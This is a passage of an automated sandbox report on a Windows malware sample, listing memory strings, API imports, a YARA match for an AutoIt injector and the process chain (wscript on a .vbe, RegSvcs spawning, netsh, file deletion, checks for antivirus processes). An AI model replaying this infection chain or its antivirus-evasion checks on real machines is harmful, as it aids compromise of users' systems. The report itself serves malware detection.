              Source: M1Y6kc9FpE.exe, 00000000.00000000.1379782636.0000000000A5C000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: getwindowlongwmemstr_ee6df88a-e
              Source: M1Y6kc9FpE.exe, 00000000.00000000.1379782636.0000000000A5C000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: setwindowlongwmemstr_b00db701-8
              Source: M1Y6kc9FpE.exe, 00000000.00000000.1379782636.0000000000A5C000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: setprocessdefaultlayoutmemstr_1685a0cf-c
              Source: M1Y6kc9FpE.exe, 00000000.00000000.1379782636.0000000000A5C000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: getwindowmemstr_939a814e-1
              Source: M1Y6kc9FpE.exe, 00000000.00000000.1379782636.0000000000A5C000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: loadstringwmemstr_f117b176-0
              Source: M1Y6kc9FpE.exe, 00000000.00000000.1379782636.0000000000A5C000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: loadstringw"memstr_11119ed3-1
              Source: M1Y6kc9FpE.exe, 00000000.00000000.1379782636.0000000000A5C000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: oemtocharbuffamemstr_e67b474d-9
              Source: M1Y6kc9FpE.exe, 00000000.00000000.1379782636.0000000000A5C000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: charupperwmemstr_2fe9b3ad-a
              Source: M1Y6kc9FpE.exe, 00000000.00000000.1379782636.0000000000A5C000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: oemtocharbuffa<charupperwmemstr_519e6981-2
              Source: M1Y6kc9FpE.exe, 00000000.00000000.1379782636.0000000000A5C000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: defwindowprocwmemstr_3bd57520-9
              Source: M1Y6kc9FpE.exe, 00000000.00000000.1379782636.0000000000A5C000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: defwindowprocwmmemstr_06263f49-e
              Source: M1Y6kc9FpE.exe, 00000000.00000000.1379782636.0000000000A5C000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: registerclassexwmemstr_0480556f-d
              Source: M1Y6kc9FpE.exe, 00000000.00000000.1379782636.0000000000A5C000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: createwindowexwmemstr_42a52636-6
              Source: M1Y6kc9FpE.exe, 00000000.00000000.1379782636.0000000000A5C000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: registerclassexwncreatewindowexwmemstr_b383412b-1
              Source: M1Y6kc9FpE.exe, 00000000.00000000.1379782636.0000000000A5C000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: iswindowmemstr_c3183a56-0
              Source: M1Y6kc9FpE.exe, 00000000.00000000.1379782636.0000000000A5C000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: destroywindowmemstr_5c606a06-f
              Source: M1Y6kc9FpE.exe, 00000000.00000000.1379782636.0000000000A5C000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: updatewindowmemstr_88e056ac-a
              Source: M1Y6kc9FpE.exe, 00000000.00000000.1379782636.0000000000A5C000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: updatewindowmemstr_68f0e7ca-b
              Source: M1Y6kc9FpE.exe, 00000000.00000000.1379782636.0000000000A5C000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: mapwindowpointsmemstr_d580856d-c
              Source: M1Y6kc9FpE.exe, 00000000.00000000.1379782636.0000000000A5C000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: copyrectmemstr_d78bd375-8
              Source: M1Y6kc9FpE.exe, 00000000.00000000.1379782636.0000000000A5C000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: mapwindowpointsucopyrectmemstr_aaacff1d-b
              Source: M1Y6kc9FpE.exe, 00000000.00000000.1379782636.0000000000A5C000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: loadcursorwmemstr_d926caa5-c
              Source: M1Y6kc9FpE.exe, 00000000.00000000.1379782636.0000000000A5C000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: loadcursorw!memstr_4176e3db-8
              Source: M1Y6kc9FpE.exe, 00000000.00000000.1379782636.0000000000A5C000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: getdcmemstr_501ce40d-a
              Source: M1Y6kc9FpE.exe, 00000000.00000000.1379782636.0000000000A5C000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: getdcememstr_ab0c0481-1
              Source: M1Y6kc9FpE.exe, 00000000.00000000.1379782636.0000000000A5C000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: releasedcmemstr_3f8275ea-c
              Source: M1Y6kc9FpE.exe, 00000000.00000000.1379782636.0000000000A5C000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: messageboxwmemstr_c18e1e5a-1
              Source: M1Y6kc9FpE.exe, 00000000.00000000.1379782636.0000000000A5C000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: findwindowexwmemstr_793a7efc-8
              Source: M1Y6kc9FpE.exe, 00000000.00000000.1379782636.0000000000A5C000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: getclassnamewmemstr_a1ee784d-f
              Source: M1Y6kc9FpE.exe, 00000000.00000000.1379782636.0000000000A5C000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: copyimagememstr_84c90c2e-9
              Source: M1Y6kc9FpE.exe, 00000000.00000000.1379782636.0000000000A5C000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: getclassnamewtcopyimage]memstr_7722ef31-b
              Source: M1Y6kc9FpE.exe, 00000000.00000000.1379782636.0000000000A5C000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: getmessagewmemstr_cd1862f5-3
              Source: M1Y6kc9FpE.exe, 00000000.00000000.1379782636.0000000000A5C000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: translatemessagememstr_79f78c1d-2
              Source: M1Y6kc9FpE.exe, 00000000.00000000.1379782636.0000000000A5C000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: dispatchmessagewmemstr_4e5b9e31-4
              Source: M1Y6kc9FpE.exe, 00000000.00000000.1379782636.0000000000A5C000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: dispatchmessagew3memstr_6e242178-3
              Source: M1Y6kc9FpE.exe, 00000000.00000000.1379782636.0000000000A5C000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: peekmessagewmemstr_9918c188-2
              Source: M1Y6kc9FpE.exe, 00000000.00000000.1379782636.0000000000A5C000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: peekmessagew6memstr_5703a4f6-0
              Source: M1Y6kc9FpE.exe, 00000000.00000000.1379782636.0000000000A5C000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: postmessagewmemstr_3fc085aa-6
              Source: M1Y6kc9FpE.exe, 00000000.00000000.1379782636.0000000000A5C000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: postmessagew&memstr_57db7fdc-7
              Source: M1Y6kc9FpE.exe, 00000000.00000000.1379782636.0000000000A5C000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: waitforinputidlememstr_b0ca4596-b
              Source: M1Y6kc9FpE.exe, 00000000.00000000.1379782636.0000000000A5C000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: iswindowvisiblememstr_d0a923f6-f
              Source: M1Y6kc9FpE.exe, 00000000.00000000.1379782636.0000000000A5C000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: dialogboxparamwmemstr_cf9a7ac5-6
              Source: M1Y6kc9FpE.exe, 00000000.00000000.1379782636.0000000000A5C000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: enddialogmemstr_e74b6eb6-d
              Source: M1Y6kc9FpE.exe, 00000000.00000000.1379782636.0000000000A5C000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: enddialog*memstr_70666469-4
              Source: M1Y6kc9FpE.exe, 00000000.00000000.1379782636.0000000000A5C000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: getdlgitemtextwmemstr_e5c0c08a-6
              Source: M1Y6kc9FpE.exe, 00000000.00000000.1379782636.0000000000A5C000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: getdlgitemtextwsmemstr_6b400803-6
              Source: M1Y6kc9FpE.exe, 00000000.00000000.1379782636.0000000000A5C000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: senddlgitemmessagewmemstr_790f16a8-6
              Source: M1Y6kc9FpE.exe, 00000000.00000000.1379782636.0000000000A5C000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: setfocusmemstr_720fab3c-d
              Source: M1Y6kc9FpE.exe, 00000000.00000000.1379782636.0000000000A5C000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: setforegroundwindowmemstr_a26c4d9f-2
              Source: M1Y6kc9FpE.exe, 00000000.00000000.1379782636.0000000000A5C000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: setforegroundwindow{memstr_ac531865-d
              Source: M1Y6kc9FpE.exe, 00000000.00000000.1379782636.0000000000A5C000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: getsyscolormemstr_bd063308-e
              Source: M1Y6kc9FpE.exe, 00000000.00000000.1379782636.0000000000A5C000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: loadbitmapwmemstr_4d8b12c2-8
              Source: M1Y6kc9FpE.exe, 00000000.00000000.1379782636.0000000000A5C000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: loadiconwmemstr_baee6e70-e
              Source: M1Y6kc9FpE.exe, 00000000.00000000.1379782636.0000000000A5C000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: destroyiconmemstr_e9c15836-7
              Source: M1Y6kc9FpE.exe, 00000000.00000000.1379782636.0000000000A5C000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: isdialogmessagewmemstr_a0182f4e-3
              Source: M1Y6kc9FpE.exe, 00000000.00000000.1379782636.0000000000A5C000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: createcompatiblebitmapmemstr_0d444114-5
              Source: M1Y6kc9FpE.exe, 00000000.00000000.1379782636.0000000000A5C000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: createcompatibledcmemstr_609cf52d-e
              Source: M1Y6kc9FpE.exe, 00000000.00000000.1379782636.0000000000A5C000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: isdialogmessagew/createcompatiblebitmap0createcompatibledcmemstr_1dd6db28-7
              Source: M1Y6kc9FpE.exe, 00000000.00000000.1379782636.0000000000A5C000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: deletedcmemstr_53243165-5
              Source: M1Y6kc9FpE.exe, 00000000.00000000.1379782636.0000000000A5C000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: deleteobjectmemstr_4bdecb63-4
              Source: M1Y6kc9FpE.exe, 00000000.00000000.1379782636.0000000000A5C000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: getdevicecapsmemstr_29eae7e9-9
              Source: M1Y6kc9FpE.exe, 00000000.00000000.1379782636.0000000000A5C000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: getdevicecapswmemstr_ad1bf018-9
              Source: M1Y6kc9FpE.exe, 00000000.00000000.1379782636.0000000000A5C000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: selectobjectmemstr_009cd005-3
              Source: M1Y6kc9FpE.exe, 00000000.00000000.1379782636.0000000000A5C000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: stretchbltmemstr_b15bced3-5
              Source: M1Y6kc9FpE.exe, 00000000.00000000.1379782636.0000000000A5C000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: createdibsectionmemstr_4f33e72f-8
              Source: M1Y6kc9FpE.exe, 00000000.00000000.1379782636.0000000000A5C000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: stretchblt5createdibsectionmemstr_85561036-0
              Source: M1Y6kc9FpE.exe, 00000000.00000000.1379782636.0000000000A5C000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: getobjectwmemstr_8f422ba4-6
              Source: M1Y6kc9FpE.exe, 00000000.00000000.1379782636.0000000000A5C000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: getopenfilenamewmemstr_21840137-6
              Source: M1Y6kc9FpE.exe, 00000000.00000000.1379782636.0000000000A5C000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: getsavefilenamewmemstr_598951f4-b
              Source: M1Y6kc9FpE.exe, 00000000.00000000.1379782636.0000000000A5C000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: commdlgextendederrormemstr_26731a7f-b
              Source: M1Y6kc9FpE.exe, 00000000.00000000.1379782636.0000000000A5C000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: openprocesstokenmemstr_1945c8f5-9
              Source: M1Y6kc9FpE.exe, 00000000.00000000.1379782636.0000000000A5C000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: adjusttokenprivilegesmemstr_07011933-3
              Source: M1Y6kc9FpE.exe, 00000000.00000000.1379782636.0000000000A5C000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: setfilesecuritywmemstr_1955e18b-4
              Source: M1Y6kc9FpE.exe, 00000000.00000000.1379782636.0000000000A5C000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: lookupprivilegevaluewmemstr_524d0d7a-c
              Source: M1Y6kc9FpE.exe, 00000000.00000000.1379782636.0000000000A5C000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: allocateandinitializesidmemstr_4634b96b-0
              Source: M1Y6kc9FpE.exe, 00000000.00000000.1379782636.0000000000A5C000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: lookupprivilegevaluew allocateandinitializesid memstr_d04fdbf6-7
              Source: M1Y6kc9FpE.exe, 00000000.00000000.1379782636.0000000000A5C000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: freesidmemstr_6158f1aa-f
              Source: M1Y6kc9FpE.exe, 00000000.00000000.1379782636.0000000000A5C000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: checktokenmembershipmemstr_1cefc10a-a
              Source: M1Y6kc9FpE.exe, 00000000.00000000.1379782636.0000000000A5C000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: freesidqchecktokenmembershipzmemstr_cdbc0498-7
              Source: M1Y6kc9FpE.exe, 00000000.00000000.1379782636.0000000000A5C000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: gettokeninformationmemstr_858b3e5f-2
              Source: M1Y6kc9FpE.exe, 00000000.00000000.1379782636.0000000000A5C000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: copysidmemstr_a5e087b8-6
              Source: M1Y6kc9FpE.exe, 00000000.00000000.1379782636.0000000000A5C000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: gettokeninformationvcopysidwmemstr_95630719-6
              Source: M1Y6kc9FpE.exe, 00000000.00000000.1379782636.0000000000A5C000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: initializesecuritydescriptormemstr_6d6ab5b0-6
              Source: M1Y6kc9FpE.exe, 00000000.00000000.1379782636.0000000000A5C000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: setsecuritydescriptordaclmemstr_091bef71-2
              Source: C:\Users\user\AppData\Local\Temp\RarSFX0\oxhvi.mscCode function: 8_2_0059BB02 SendInput,keybd_event,8_2_0059BB02
              Source: C:\Users\user\AppData\Local\Temp\RarSFX0\oxhvi.mscCode function: 8_2_0059EBE5 mouse_event,8_2_0059EBE5
              Source: C:\Users\user\Desktop\M1Y6kc9FpE.exeProcess created: C:\Windows\SysWOW64\wscript.exe "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Local\Temp\RarSFX0\wnrs.vbe" Jump to behavior
              Source: C:\Windows\SysWOW64\wscript.exeProcess created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /c ipconfig /release Jump to behavior
              Source: C:\Windows\SysWOW64\wscript.exeProcess created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /c oxhvi.msc bvqmcwxut.docxJump to behavior
              Source: C:\Windows\SysWOW64\wscript.exeProcess created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /c ipconfig /renew Jump to behavior
              Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\ipconfig.exe ipconfig /releaseJump to behavior
              Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Users\user\AppData\Local\Temp\RarSFX0\oxhvi.msc oxhvi.msc bvqmcwxut.docxJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\RarSFX0\oxhvi.mscProcess created: C:\Users\user\AppData\Local\Temp\RegSvcs.exe "C:\Users\user\AppData\Local\Temp\RegSvcs.exe"Jump to behavior
              Source: C:\Users\user\AppData\Local\Temp\RarSFX0\oxhvi.mscProcess created: C:\Users\user\AppData\Local\Temp\RegSvcs.exe "C:\Users\user\AppData\Local\Temp\RegSvcs.exe"Jump to behavior
              Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\ipconfig.exe ipconfig /renewJump to behavior
              Source: C:\Windows\SysWOW64\ipconfig.exeProcess created: C:\Windows\SysWOW64\cmd.exe /c del "C:\Users\user\AppData\Local\Temp\RegSvcs.exe"Jump to behavior
              Source: C:\Users\user\AppData\Local\Temp\qbmt\oxhvi.msc.exeProcess created: C:\Users\user\AppData\Local\Temp\RegSvcs.exe "C:\Users\user\AppData\Local\Temp\RegSvcs.exe"
              Source: C:\Users\user\AppData\Local\Temp\qbmt\oxhvi.msc.exeProcess created: C:\Users\user\AppData\Local\Temp\RegSvcs.exe "C:\Users\user\AppData\Local\Temp\RegSvcs.exe"
              Source: C:\Users\user\AppData\Local\Temp\qbmt\oxhvi.msc.exeProcess created: C:\Users\user\AppData\Local\Temp\RegSvcs.exe "C:\Users\user\AppData\Local\Temp\RegSvcs.exe"
              Source: C:\Users\user\AppData\Local\Temp\qbmt\oxhvi.msc.exeProcess created: C:\Users\user\AppData\Local\Temp\RegSvcs.exe "C:\Users\user\AppData\Local\Temp\RegSvcs.exe"
              Source: C:\Users\user\AppData\Local\Temp\qbmt\oxhvi.msc.exeProcess created: C:\Users\user\AppData\Local\Temp\RegSvcs.exe "C:\Users\user\AppData\Local\Temp\RegSvcs.exe"
              Source: C:\Users\user\AppData\Local\Temp\qbmt\oxhvi.msc.exeProcess created: C:\Users\user\AppData\Local\Temp\RegSvcs.exe "C:\Users\user\AppData\Local\Temp\RegSvcs.exe"
              Source: C:\Users\user\AppData\Local\Temp\RarSFX0\oxhvi.mscCode function: 8_2_005913F2 GetSecurityDescriptorDacl,GetAclInformation,GetLengthSid,GetLengthSid,GetAce,AddAce,GetLengthSid,GetProcessHeap,HeapAlloc,GetLengthSid,CopySid,AddAce,SetSecurityDescriptorDacl,SetUserObjectSecurity,HeapFree,GetProcessHeap,HeapFree,GetProcessHeap,HeapFree,GetProcessHeap,HeapFree,GetProcessHeap,HeapFree,8_2_005913F2
              Source: C:\Users\user\AppData\Local\Temp\RarSFX0\oxhvi.mscCode function: 8_2_00591EF3 AllocateAndInitializeSid,CheckTokenMembership,FreeSid,8_2_00591EF3
              Source: M1Y6kc9FpE.exe, 00000000.00000003.1410420987.0000000006AAC000.00000004.00000020.00020000.00000000.sdmp, oxhvi.msc, 00000008.00000000.1525893636.00000000005F3000.00000002.00000001.01000000.0000000A.sdmp, oxhvi.msc, 00000008.00000003.1543300339.0000000000F8D000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Run Script:AutoIt script files (*.au3, *.a3x)*.au3;*.a3xAll files (*.*)*.*au3#include depth exceeded. Make sure there are no recursive includesError opening the file>>>AUTOIT SCRIPT<<<Bad directive syntax errorUnterminated stringCannot parse #includeUnterminated group of commentsONOFF0%d%dShell_TrayWndREMOVEKEYSEXISTSAPPENDblankinfoquestionstopwarning
              Source: oxhvi.msc.exe, 0000001B.00000003.1937912252.0000000001908000.00000004.00000020.00020000.00000000.sdmp, oxhvi.msc.exe, 0000001B.00000003.1939938542.000000000191D000.00000004.00000020.00020000.00000000.sdmp, oxhvi.msc.exe, 0000001B.00000003.1938671200.0000000001912000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Program Manager&
              Source: oxhvi.msc, 00000008.00000003.1655538130.0000000000EEE000.00000004.00000020.00020000.00000000.sdmp, oxhvi.msc, 00000008.00000003.1657788132.0000000000EFF000.00000004.00000020.00020000.00000000.sdmp, oxhvi.msc, 00000008.00000003.1657811765.0000000000F02000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Program Manager
              Source: oxhvi.msc, explorer.exe, 00000011.00000002.2639211861.000000000936E000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000011.00000000.1639216371.000000000936E000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000011.00000000.1635832502.0000000001090000.00000002.00000001.00040000.00000000.sdmpBinary or memory string: Shell_TrayWnd
              Source: explorer.exe, 00000011.00000000.1635832502.0000000001090000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 00000011.00000002.2628883555.0000000000A20000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000011.00000000.1635565811.0000000000A20000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Progman
              Source: oxhvi.msc, 00000008.00000003.1655595000.0000000000EAC000.00000004.00000020.00020000.00000000.sdmp, oxhvi.msc, 00000008.00000003.1538146992.0000000000EA4000.00000004.00000020.00020000.00000000.sdmp, oxhvi.msc, 00000008.00000003.1538081889.0000000000E93000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: If WinGetText("Program Manager") = "0" Then
              Source: explorer.exe, 00000011.00000000.1635832502.0000000001090000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 00000011.00000002.2629645027.0000000001090000.00000002.00000001.00040000.00000000.sdmpBinary or memory string: 0Program Manager
              Source: oxhvi.msc.exe, 00000016.00000003.1725806155.0000000000C85000.00000004.00000020.00020000.00000000.sdmp, oxhvi.msc.exe, 00000016.00000003.1725721941.0000000000C75000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: If WinGetText("Program Manager") = "0" Then@
              Source: explorer.exe, 00000011.00000000.1635832502.0000000001090000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 00000011.00000002.2629645027.0000000001090000.00000002.00000001.00040000.00000000.sdmpBinary or memory string: Progmanlock
              Source: oxhvi.msc.exe, 0000001B.00000002.1942146299.0000000001898000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: If WinGetText("Program Manager") = "0" Then;
              Source: explorer.exe, 00000011.00000002.2639211861.000000000936E000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000011.00000000.1639216371.000000000936E000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000011.00000003.2284256993.000000000936E000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: Shell_TrayWnd]1Q

              Language, Device and Operating System Detection

              barindex
              Yara detected Autoit Injector
              Source: Yara matchFile source: Process Memory Space: oxhvi.msc PID: 8084, type: MEMORYSTR
              Source: Yara matchFile source: Process Memory Space: oxhvi.msc.exe PID: 7596, type: MEMORYSTR
              Source: Yara matchFile source: Process Memory Space: oxhvi.msc.exe PID: 1796, type: MEMORYSTR
              Source: Yara matchFile source: C:\Users\user\AppData\Local\Temp\qbmt\bvqmcwxut.docx, type: DROPPED
              Source: Yara matchFile source: C:\Users\user\AppData\Local\Temp\RarSFX0\bvqmcwxut.docx, type: DROPPED
              Source: C:\Users\user\Desktop\M1Y6kc9FpE.exeCode function: 0_2_00A46694 cpuid 0_2_00A46694
              Source: C:\Users\user\Desktop\M1Y6kc9FpE.exeCode function: GetLocaleInfoW,GetNumberFormatW,0_2_00A3FD34
              Source: C:\Users\user\Desktop\M1Y6kc9FpE.exeCode function: 0_2_00A4454A GetCommandLineW,OpenFileMappingW,MapViewOfFile,UnmapViewOfFile,MapViewOfFile,UnmapViewOfFile,CloseHandle,SetEnvironmentVariableW,GetLocalTime,_swprintf,SetEnvironmentVariableW,GetModuleHandleW,LoadIconW,DialogBoxParamW,Sleep,DeleteObject,DeleteObject,CloseHandle,0_2_00A4454A
              Source: C:\Users\user\AppData\Local\Temp\RarSFX0\oxhvi.mscCode function: 8_2_0058E5F8 GetUserNameW,8_2_0058E5F8
              Source: C:\Users\user\AppData\Local\Temp\RarSFX0\oxhvi.mscCode function: 8_2_0056BCF2 _free,_free,_free,GetTimeZoneInformation,WideCharToMultiByte,WideCharToMultiByte,_free,8_2_0056BCF2
              Source: C:\Users\user\Desktop\M1Y6kc9FpE.exeCode function: 0_2_00A303BE GetVersionExW,0_2_00A303BE
              Source: C:\Windows\SysWOW64\wscript.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuidJump to behavior

              Lowering of HIPS / PFW / Operating System Security Settings

              barindex
              Uses netsh to modify the Windows network and firewall settings
              Source: C:\Windows\explorer.exeProcess created: C:\Windows\SysWOW64\netsh.exe "C:\Windows\SysWOW64\netsh.exe"
              Source: oxhvi.msc, 00000008.00000003.1655538130.0000000000EEE000.00000004.00000020.00020000.00000000.sdmp, oxhvi.msc, 00000008.00000003.1658647659.0000000000F64000.00000004.00000020.00020000.00000000.sdmp, oxhvi.msc, 00000008.00000002.1660524267.0000000000F65000.00000004.00000020.00020000.00000000.sdmp, oxhvi.msc, 00000008.00000003.1656577841.0000000000F38000.00000004.00000020.00020000.00000000.sdmp, oxhvi.msc, 00000008.00000003.1656756561.0000000000F58000.00000004.00000020.00020000.00000000.sdmp, oxhvi.msc.exe, 00000016.00000003.1807175907.0000000000CC8000.00000004.00000020.00020000.00000000.sdmp, oxhvi.msc.exe, 00000016.00000003.1807629194.0000000000D53000.00000004.00000020.00020000.00000000.sdmp, oxhvi.msc.exe, 00000016.00000002.1811336617.0000000000D54000.00000004.00000020.00020000.00000000.sdmp, oxhvi.msc.exe, 00000016.00000003.1807328415.0000000000D38000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: bdagent.exe
              Source: oxhvi.msc, 00000008.00000003.1655538130.0000000000EEE000.00000004.00000020.00020000.00000000.sdmp, oxhvi.msc, 00000008.00000003.1658647659.0000000000F64000.00000004.00000020.00020000.00000000.sdmp, oxhvi.msc, 00000008.00000002.1660524267.0000000000F65000.00000004.00000020.00020000.00000000.sdmp, oxhvi.msc, 00000008.00000003.1656577841.0000000000F38000.00000004.00000020.00020000.00000000.sdmp, oxhvi.msc, 00000008.00000003.1656756561.0000000000F58000.00000004.00000020.00020000.00000000.sdmp, oxhvi.msc.exe, 0000001B.00000003.1937912252.0000000001908000.00000004.00000020.00020000.00000000.sdmp, oxhvi.msc.exe, 0000001B.00000002.1942689431.0000000001985000.00000004.00000020.00020000.00000000.sdmp, oxhvi.msc.exe, 0000001B.00000003.1938031796.000000000190C000.00000004.00000020.00020000.00000000.sdmp, oxhvi.msc.exe, 0000001B.00000003.1938394774.0000000001968000.00000004.00000020.00020000.00000000.sdmp, oxhvi.msc.exe, 0000001B.00000003.1938584375.0000000001991000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: avp.exe
              Source: oxhvi.msc, 00000008.00000003.1655538130.0000000000EEE000.00000004.00000020.00020000.00000000.sdmp, oxhvi.msc, 00000008.00000003.1658647659.0000000000F64000.00000004.00000020.00020000.00000000.sdmp, oxhvi.msc, 00000008.00000002.1660524267.0000000000F65000.00000004.00000020.00020000.00000000.sdmp, oxhvi.msc, 00000008.00000003.1656577841.0000000000F38000.00000004.00000020.00020000.00000000.sdmp, oxhvi.msc, 00000008.00000003.1656756561.0000000000F58000.00000004.00000020.00020000.00000000.sdmp, oxhvi.msc.exe, 00000016.00000003.1807175907.0000000000CC8000.00000004.00000020.00020000.00000000.sdmp, oxhvi.msc.exe, 00000016.00000003.1807629194.0000000000D53000.00000004.00000020.00020000.00000000.sdmp, oxhvi.msc.exe, 00000016.00000002.1811336617.0000000000D54000.00000004.00000020.00020000.00000000.sdmp, oxhvi.msc.exe, 00000016.00000003.1807328415.0000000000D38000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: AVGUI.exe
              Source: oxhvi.msc.exe, 0000001B.00000003.1938721846.0000000001979000.00000004.00000020.00020000.00000000.sdmp, oxhvi.msc.exe, 0000001B.00000003.1937912252.0000000001908000.00000004.00000020.00020000.00000000.sdmp, oxhvi.msc.exe, 0000001B.00000002.1942689431.0000000001985000.00000004.00000020.00020000.00000000.sdmp, oxhvi.msc.exe, 0000001B.00000003.1938031796.000000000190C000.00000004.00000020.00020000.00000000.sdmp, oxhvi.msc.exe, 0000001B.00000003.1940675061.0000000001985000.00000004.00000020.00020000.00000000.sdmp, oxhvi.msc.exe, 0000001B.00000003.1938394774.0000000001968000.00000004.00000020.00020000.00000000.sdmp, oxhvi.msc.exe, 0000001B.00000003.1938810056.000000000197E000.00000004.00000020.00020000.00000000.sdmp, oxhvi.msc.exe, 0000001B.00000003.1938611568.0000000001976000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: procexp.exe
